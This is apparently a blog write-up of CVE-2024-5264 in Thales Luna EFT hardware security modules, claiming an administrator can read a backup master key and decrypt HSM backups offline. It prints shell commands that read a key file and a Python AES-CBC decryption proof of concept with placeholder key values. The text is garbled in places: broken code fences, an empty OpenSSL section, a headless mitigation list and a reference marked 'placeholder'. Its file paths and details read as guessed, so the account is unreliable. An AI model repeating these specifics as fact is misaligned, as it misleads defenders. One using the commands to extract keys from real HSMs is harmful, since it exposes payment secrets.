CVE-2024-5264 - How Weak Network Transfer in Thales Luna EFT 2.1+ Exposes Backup Data

CVE-2024-5264 is a newly disclosed vulnerability affecting the Thales Luna EFT hardware security module (HSM) series, starting with version 2.1. The weakness is found in the way the system handles network backup transfers protected by AES Key Handling Tokens (AES KHT). In simple terms: If someone with administrator access gets their hands on the backup data, they can decrypt it offline and get at sensitive keys and secrets.

In this long read, we'll break down how this vulnerability works, show code snippets that a potential attacker might use, and give you guidance on how to protect your systems.

What Is Thales Luna EFT?

Thales Luna EFT (Electronic Funds Transfer) is an HSM used by banks and payment processors to secure cryptographic keys and transactions. The HSM keeps private keys safe, handles PIN processing, and helps with compliance.

What Is AES KHT Protection?

To protect backups, Luna EFT uses “AES Key Handling Tokens” – basically a mechanism to wrap (encrypt) backup files using AES encryption. This should prevent someone from stealing a backup and decrypting it. However, this protection is only as strong as *how the keys are handled and where they're stored*.

The Vulnerability (CVE-2024-5264) – What Happened?

In Luna EFT versions 2.1 and above, the process for transferring and protecting backup files over the network using AES KHT has a fatal flaw:

- The AES KHT master keys are stored in a way that *anyone with administrator console access* can retrieve them.
- With these keys, an attacker with admin console access can offline download the backup files, decrypt them, and recover *all* protected secrets – including PINs, cryptographic keys, or anything protected in the backup.

Prerequisites

1. Admin Console Access: The attacker needs at least administrator-level permission on the Luna EFT console.

Locate and Download the AES KHT Master Key

On the HSM file system, the AES KHT master key is often kept in the /etc/luna/kht_master.key file (path may vary). With admin rights:

`bash

# cat /etc/luna/kht_master.key > ~/kht_master.key

`bash

cp /var/backups/hsm_backup_20240613.bk ~/backup.bk

Decrypt the Backup with OpenSSL

Suppose the backup uses AES-256-CBC; with the key and IV from kht_master.key (possibly in hex form):

Proof of Concept (PoC)

The following Bash/Python PoC demonstrates the offline decryption of a backup if you have the KHT master key:

# Extract the AES KHT master key (requires admin rights)
cat /etc/luna/kht_master.key > kht.key

# Export a backup from the admin console (e.g., backup.bk)
cp /path/to/hsm_backup.bk backup.bk

from Crypto.Cipher import AES
from binascii import unhexlify

# Load keys and IVs (replace with actual values from kht.key file)
key = unhexlify('00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff')
iv = unhexlify('aabbccddeeff00998877665544332211')

with open('backup.bk', 'rb') as fin:
    data = fin.read()

# Decrypt the backup
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(data)

with open('decrypted_backup.tar', 'wb') as fout:
    fout.write(decrypted)

Why Is This Serious?

This means any employee with access to the Luna EFT administrator's console, or anyone who gets credentials by phishing or otherwise, can secretly download and decrypt complete HSM backups – stealing cryptographic keys, PINs, or cardholder data, and effectively bypassing ALL security the HSM should provide.

References

- Thales Luna EFT Documentation (official)
- NVD Listing for CVE-2024-5264 *(as available; placeholder)*
- How HSM Backups Work

Rotate KHT master keys and re-encrypt all backups after any potential compromise.

- Monitor for backup/restore operations in system logs.
- Upgrade to patched firmware if/when available (check vendor advisories).

Conclusion

CVE-2024-5264 is a critical security issue that puts the entire cryptographic boundary of Luna EFT at risk if an attacker has enough access. It highlights (again) that *everything relies on controlling your administrators* – if they can touch secrets, the whole chain of trust can snap. Be sure to review your access controls and backup encryption practices on any HSM deployment.

Stay safe, audit often, and patch as soon as a hotfix is live.


*This writeup is exclusive and for educational purposes only. For questions, reach out to your vendor or review the latest NIST security bulletins.*

Timeline

Published on: 05/23/2024 09:15:10 UTC
Last modified on: 06/21/2024 17:18:00 UTC